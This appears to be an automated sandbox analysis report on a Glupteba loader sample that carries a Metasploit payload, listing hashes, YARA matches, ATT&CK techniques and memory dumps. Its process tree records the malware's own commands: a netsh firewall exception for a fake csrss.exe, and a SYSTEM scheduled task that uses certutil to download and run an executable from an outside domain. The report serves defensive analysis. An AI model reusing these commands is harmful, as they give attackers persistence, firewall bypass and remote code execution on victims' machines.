glupteba | df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51

General

Target

2654d11f2d3ce974e432ad1c84bcd1f7.exe
Size

4.5MB
MD5

2654d11f2d3ce974e432ad1c84bcd1f7
SHA1

053efdc46790dd1b49e93863df59c83c39342c8f
SHA256

df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51
SHA512

8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7
SSDEEP

98304:UvcNtBvoJc7I0r0fy0hqQRi69numaD09pJ6N5f1qlFBdWiBl5E1oz2tiuD:UkJtjr0fXRi65rwfCFTZteoz2B

Score

10^/10

glupteba metasploit backdoor dropper evasion loader trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 18 IoCs

resource	yara_rule
behavioral1/memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp	family_glupteba
behavioral1/memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp	family_glupteba
behavioral1/memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp	family_glupteba
behavioral1/memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2636	netsh.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2792	schtasks.exe
368	schtasks.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	28	Go-http-client/1.1
HTTP User-Agent header	29	Go-http-client/1.1

C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe
"C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
1⤵
PID:1164
- C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe
  "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
  2⤵
  PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:2580
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe /51-51
    3⤵
    PID:2504
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:2792
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:368
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      PID:2356

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240102022855.log C:\Windows\Logs\CBS\CbsPersist_20240102022855.cab
1⤵
PID:2404

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:2636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Create or Modify System Process

1

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

1

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1164-1-0x0000000000F20000-0x000000000135C000-memory.dmp

Filesize
4.2MB

Download
memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp

Filesize
9.1MB

Download
memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/1164-0-0x0000000000F20000-0x000000000135C000-memory.dmp

Filesize
4.2MB

Download
memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/1164-6-0x0000000000F20000-0x000000000135C000-memory.dmp

Filesize
4.2MB

Download
memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp

Filesize
9.1MB

Download
memory/2356-45-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2356-61-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-20-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2504-329-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-328-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-22-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-26-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-327-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-326-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2848-5-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2848-8-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download
memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp

Filesize
9.1MB

Download
memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2848-21-0x0000000000F70000-0x00000000013AC000-memory.dmp

Filesize
4.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads